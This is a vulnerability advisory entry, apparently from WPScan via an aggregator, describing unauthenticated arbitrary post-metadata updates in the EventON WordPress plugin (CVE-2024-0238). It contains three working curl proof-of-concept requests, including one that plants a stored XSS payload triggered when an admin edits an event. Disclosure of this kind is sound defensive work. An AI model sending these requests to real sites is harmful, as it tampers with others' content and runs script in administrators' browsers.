Lucene search
Erwan LR (WPScan)WPEX-ID:774655AC-B201-4D9F-8790-9EFF8564BC91HistoryJan 10, 2024 - 12:00 a.m.
EventON (Free < 2.2.8, Premium < 4.5.6) - Unauthenticated Arbitrary Post Metadata Update
2024-01-1000:00:00
Erwan LR (WPScan)
31
eventon
arbitrary post update
stored xss
unauthenticated access
admin exploit
security vulnerability
0.001 Low
EPSS
Percentile
20.8%
Description The plugins do not have authorisation in an AJAX action, and does not ensure that the post to be updated belong to the plugin, allowing unauthenticated users to update arbitrary post metadata. Note: Such issue could lead to Unauthenticated Stored XSS due to the lack of sanitisation in the Free plugin before 2.7.7 and Premium before 4.5.5
To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240:
curl -X POST --data "eid=240&values[_vir_url]=https://attacker.com/" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta'
To set the my_meta metadata (if it does not exist, it will be created as a custom field) to attacker on the post with ID 20:
curl -X POST --data "eid=20&values[my_meta]=attacker" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta'
This can lead to Stored XSS in Free < 2.7.7 and Premium <= 4.5.4
curl -X POST --data 'eid=240&values[_evcal_ec_f1a1_cus]=" style=animation-name:rotation onanimationstart=alert(/XSS/)//' 'https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta'
The XSS will be triggered when an admin will edit the event in the backendRelated
prion
prion
Code injection
2024-01-16 16:15:00
nvd
nvd
CVE-2024-0238
2024-01-16 16:15:14
cve
cve
CVE-2024-0238
2024-01-16 16:15:14
wpvulndb
wpvulndb
cvelist
cvelist